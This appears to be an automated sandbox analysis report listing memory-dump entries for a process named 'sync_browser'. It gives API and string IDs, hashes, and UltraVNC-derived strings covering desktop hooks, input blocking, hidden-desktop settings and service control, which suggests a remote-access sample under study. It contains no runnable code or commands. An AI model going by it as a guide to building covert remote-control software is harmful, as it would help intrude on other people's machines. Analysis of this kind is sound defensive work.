                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
                                                                                          • String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                                          • API String ID: 378279424-2704384803
                                                                                          • Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                                          • Instruction ID: 9e7e4cf4d831e91b5b7a7f452dcdd9817441e7f5c3bc3f2c37553bacf63d7f86
                                                                                          • Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                                                          • Instruction Fuzzy Hash: AE028223B286C2A6FB6C9B65C5546F863A4FF60B44F144636EA1E932E0CF3CA45DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                                          • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                                          • API String ID: 33112563-1779637096
                                                                                          • Opcode ID: 1be1030451942fc1503267f534b42bd66129e4ea34a4f6e245b6222fff45b2b0
                                                                                          • Instruction ID: 5463c944b6031ebfe9863b25309f118fb30d65d8f08398b20b4584570ada30ea
                                                                                          • Opcode Fuzzy Hash: 1be1030451942fc1503267f534b42bd66129e4ea34a4f6e245b6222fff45b2b0
                                                                                          • Instruction Fuzzy Hash: 4BB12733918BC18AE328CF78F84469AB7A8FB14B04F94492AD7EA46250DF7DF059C754
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
                                                                                          • String ID: F
                                                                                          • API String ID: 2411647221-1304234792
                                                                                          • Opcode ID: c1a9219981f70a567aa0cdfc7355be092d3ec4ad7157660908e4aed3f1e61130
                                                                                          • Instruction ID: dfad077d564a492ce5675c3f842f70d932e88c200ab987e0c14da0efa80b4c95
                                                                                          • Opcode Fuzzy Hash: c1a9219981f70a567aa0cdfc7355be092d3ec4ad7157660908e4aed3f1e61130
                                                                                          • Instruction Fuzzy Hash: A6C1D233B28A8186E710DB6AE4447A9B7A1FB98F94F544031EE5E83755DF3DD849CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                                          • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                                          • API String ID: 2697070071-1399849103
                                                                                          • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                                          • Instruction ID: 90733297c5dd59d6e0b3e4f98ca3396430596b643ce466c726337d049b598a66
                                                                                          • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                                          • Instruction Fuzzy Hash: 63816477A28A4286EB54CF25A80466AB7A9FB98B85F445135FD4E87B64DF3CE00DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                                                          • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 2965397059-206656798
                                                                                          • Opcode ID: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                                          • Instruction ID: b413db0da94784da844039f6278749e3114fcd4cbfa1ae4ffaf571db49454362
                                                                                          • Opcode Fuzzy Hash: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                                          • Instruction Fuzzy Hash: 0D42C623A28A8285FB60CB35C8483FD27A5FBA4798F544235EA1D8B6D5DF3CE549C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMulusermedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                                          • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                                          • API String ID: 2145620463-2328478964
                                                                                          • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                                          • Instruction ID: b0da2db8d607862fc02a191c4818547acea62e5f6a942aafa17ab3cead1eb9d0
                                                                                          • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                                          • Instruction Fuzzy Hash: 16E1B227A2868289F720CF74D8442A9B3A5FF64798F504235FE5E87A94EF3CD549C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 246551654-3977938048
                                                                                          • Opcode ID: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                                          • Instruction ID: 84f2b53325c1675bf6c92e15a445b833e81ad3b1262f7b665c5db61dd0829fb6
                                                                                          • Opcode Fuzzy Hash: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                                          • Instruction Fuzzy Hash: 7E22B033A18A918AF7648B35C4587FE37A5FBA5B48F044135EA4D8B6A5DF3CE948C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                                                          • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                                                          • API String ID: 1729393483-4131161223
                                                                                          • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                                          • Instruction ID: 0932ff7649af65b1c8ba03a63dbb9bbe80573297fece72e4fbf66769b7d7d73b
                                                                                          • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                                          • Instruction Fuzzy Hash: C0B1A037F2968286FB60CF69E8402B967A4FB64764F684135EA4D9B684DF3CE509C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                                                          • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                                                          • API String ID: 524771730-2664985301
                                                                                          • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                                          • Instruction ID: 8fcb34daab27fe8da2bb2068795a676b02df7ec200800289c163c708f4cd28a5
                                                                                          • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                                          • Instruction Fuzzy Hash: 1AD16137A69B82D5E760CB25E8442A977B0FB18360F444236EA6D977E0DF3CE529C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
                                                                                          • String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
                                                                                          • API String ID: 1989023930-362996323
                                                                                          • Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                                          • Instruction ID: dad0b330134f589517a3a62b90e5effda80895b8dad08fb78565e796dc8cc26f
                                                                                          • Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                                          • Instruction Fuzzy Hash: 66B1A923B28B8296EA54DBA0E4557EAA360FB99354F844131FB1D57B94DF3CE52EC300
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32 ref: 00007FF67E7D2E5D
                                                                                          • OpenServiceA.ADVAPI32 ref: 00007FF67E7D2EAD
                                                                                          • GetLastError.KERNEL32 ref: 00007FF67E7D2EBB
                                                                                          • CloseServiceHandle.ADVAPI32 ref: 00007FF67E7D2EE0
                                                                                            • Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
                                                                                            • Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
                                                                                            • Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
                                                                                            • Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
                                                                                            • Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                                                          • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                                                          • API String ID: 1921882253-4018834470
                                                                                          • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                                          • Instruction ID: 751dbf50686184286289ab488db6c557b771d1c259d905c1dfb057ddb1b7b494
                                                                                          • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                                          • Instruction Fuzzy Hash: 62415327F2CA4382FA14DB15E8542B8A365FF69B84F540435F90EC62A4EF2DE58ED700
                                                                                          APIs
                                                                                          Strings
                                                                                          • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF67E7CA9E6
                                                                                          • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF67E7CA9BB
                                                                                          • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CAB3F
                                                                                          • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAA4D
                                                                                          • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAA26
                                                                                          • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAAE1
                                                                                          • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAAC1
                                                                                          • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CA94D
                                                                                          • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CA97B
                                                                                          • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CAB1D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
